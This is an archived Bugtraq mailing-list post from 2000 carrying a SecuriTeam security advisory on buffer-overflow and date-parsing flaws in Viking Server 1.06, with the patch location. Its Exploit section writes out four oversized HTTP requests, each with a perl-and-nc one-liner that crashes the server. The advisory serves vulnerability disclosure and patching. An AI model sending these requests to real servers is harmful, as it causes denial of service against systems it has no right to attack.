NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2000-08

Subject: [NT] Viking security vulnerabilities enable remote code execution (long URL, date parsing)
From: Aviram Jenik (aviramBEYONDSECURITY.COM)
Date: Mon Aug 28 2000 - 13:59:10 CDT

Next message: FreeBSD Security Advisories: "FreeBSD Ports Security Advisory: FreeBSD-SA-00:39.netscape"
Previous message: Joseph Nicholas Yarbrough: "xchat"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com

Viking security vulnerabilities enable remote code execution (long
URL,
date parsing)
----------------------------------------------------------------------------

----
SUMMARY
 <http://www.robtex.com/viking/> Viking Server is a multi-protocol
Internet server/proxy for Windows 95/NT that supports a wide range of
protocols such as HTTP, FTP, SOCKS, DNS, TELNET, SMTP, POP3, UUCP, FCP,
ICP, etc. Unfortunately it does not perform proper buffer bounds checking,
enabling attackers to launch a buffer overflow attack and possibly execute
arbitrary code. Also, an incorrect parsing of non-date data causes an
exception, enabling remote attackers to cause a Denial of Service attack
against the product.
DETAILS
Vulnerable systems:
Viking 1.06 build 355 and prior
Immune systems:
Viking 1.06 build 370 and above
Exploit:
Any of the following HTTP commands will crash the server:
(1)
GET [x11765] HTTP/1.1<enter><enter>
(Cmd: perl -e "print \"GET {['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)
(2)
GET / HTTP/1.1<enter>
Unless-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since:
{['x'x14765]}\n\n\""|nc 127.1 80)
(3)
GET / HTTP/1.1<enter>
If-Range: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: {['x'x14765]}\n\n\""|nc
127.1 80)
(4)
GET / HTTP/1.1<enter>
If-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since:
{['x'x14765]}\n\n\""|nc 127.1 80)
Patch:
Robotex has responded immediately and released a patch that deals with
these issues.
You can download the patch at:
ftp://ftp.robtex.com/robtex/viking/beta/viking.zip
http://www.robtex.com/files/viking/beta/viking.zip
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
====================
--
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com

Next message: FreeBSD Security Advisories: "FreeBSD Ports Security Advisory: FreeBSD-SA-00:39.netscape"
Previous message: Joseph Nicholas Yarbrough: "xchat"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]